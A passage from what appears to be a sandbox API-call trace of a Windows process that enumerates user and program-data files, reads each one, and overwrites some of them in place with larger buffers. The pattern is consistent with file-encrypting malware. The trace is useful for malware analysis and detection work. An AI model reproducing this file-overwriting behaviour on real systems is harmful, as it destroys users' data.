"c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.208] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.208] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6ce [0188.209] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.209] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.209] ReleaseMutex (hMutex=0x168) returned 1 [0188.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSOUC.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSOUC.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0188.209] ReadFile (in: hFile=0x214, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6ce, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2e9f2bc*=0x6ce, lpOverlapped=0x0) returned 1 [0188.211] CloseHandle (hObject=0x214) returned 1 [0188.211] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.211] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.211] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6e0 [0188.925] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.925] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.925] ReleaseMutex (hMutex=0x168) returned 1 [0188.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0188.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0188.925] ReadFile (in: hFile=0x214, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6e0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2e9f2bc*=0x6e0, lpOverlapped=0x0) returned 1 [0188.927] CloseHandle (hObject=0x214) returned 1 [0188.927] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.927] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.927] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6da [0188.928] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.928] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.928] ReleaseMutex (hMutex=0x168) returned 1 [0188.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0188.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0188.928] ReadFile (in: hFile=0x214, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6da, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2e9f2bc*=0x6da, lpOverlapped=0x0) returned 1 [0188.929] CloseHandle (hObject=0x214) returned 1 [0188.930] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.930] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.930] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x23588 [0188.930] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.930] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.930] ReleaseMutex (hMutex=0x168) returned 1 [0188.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0188.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc3c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x86.msi", lpUsedDefaultChar=0x0) returned 25 [0188.930] ReadFile (in: hFile=0x214, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0188.931] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x22588 [0188.931] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.931] CloseHandle (hObject=0x214) returned 1 [0188.931] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.932] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.932] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x24588 [0188.932] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.932] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.932] ReleaseMutex (hMutex=0x168) returned 1 [0188.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0188.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc3c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x86.msi", lpUsedDefaultChar=0x0) returned 25 [0188.933] ReadFile (in: hFile=0x214, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0188.933] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x23588 [0188.933] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.934] CloseHandle (hObject=0x214) returned 1 [0188.934] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.934] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.934] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x23588 [0188.934] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.935] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.935] ReleaseMutex (hMutex=0x168) returned 1 [0188.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0188.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc3c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x64.msi", lpUsedDefaultChar=0x0) returned 25 [0188.935] ReadFile (in: hFile=0x214, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0188.936] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x22588 [0188.936] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.936] CloseHandle (hObject=0x214) returned 1 [0188.936] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.937] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.937] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x25588 [0188.937] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.937] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.937] ReleaseMutex (hMutex=0x168) returned 1 [0188.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0188.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc3c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x64.msi", lpUsedDefaultChar=0x0) returned 25 [0188.937] ReadFile (in: hFile=0x214, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0188.938] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x24588 [0188.938] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.938] CloseHandle (hObject=0x214) returned 1 [0188.938] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.939] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.939] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xbf3b8 [0188.939] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.939] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.939] ReleaseMutex (hMutex=0x168) returned 1 [0188.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x86.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x86.exe", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VC_redist.x86.exe", lpUsedDefaultChar=0x0) returned 17 [0188.940] ReadFile (in: hFile=0x214, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0188.940] ReadFile (in: hFile=0x214, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.941] SetFilePointer (in: hFile=0x214, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xbe3b8 [0188.941] ReadFile (in: hFile=0x214, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0188.941] CloseHandle (hObject=0x214) returned 1 [0188.941] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0188.942] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.943] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x43 [0188.943] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0188.943] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0188.943] ReleaseMutex (hMutex=0x168) returned 1 [0188.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7360c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0188.943] ReadFile (in: hFile=0x214, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x43, lpOverlapped=0x0) returned 1 [0188.945] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.633] WriteFile (in: hFile=0x214, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0189.633] CloseHandle (hObject=0x214) returned 1 [0189.633] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.634] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.635] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x414 [0189.635] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.635] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.635] ReleaseMutex (hMutex=0x168) returned 1 [0189.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="01_Music_auto_rated_at_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0189.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="01_Music_auto_rated_at_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa54dc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="01_Music_auto_rated_at_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0189.635] ReadFile (in: hFile=0x214, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2e9f2bc*=0x414, lpOverlapped=0x0) returned 1 [0189.637] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0189.637] WriteFile (in: hFile=0x214, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x99c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x99c, lpOverlapped=0x0) returned 1 [0189.637] CloseHandle (hObject=0x214) returned 1 [0189.637] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x214 [0189.638] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.638] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x401 [0189.638] SetFilePointer (in: hFile=0x214, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0189.638] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0189.638] ReleaseMutex (hMutex=0x168) returned 1 [0189.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="09_Music_played_the_most.wpl", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0189.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="09_Music_played_the_most.wpl", cchWideChar=28, lpMultiByteStr=0x1f8fc3c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="09_Music_played_the_most.wpl", lpUsedDefaultChar=0x0) returned 28 [0189.639] ReadFile (in: hFile=0x214, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x401, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | 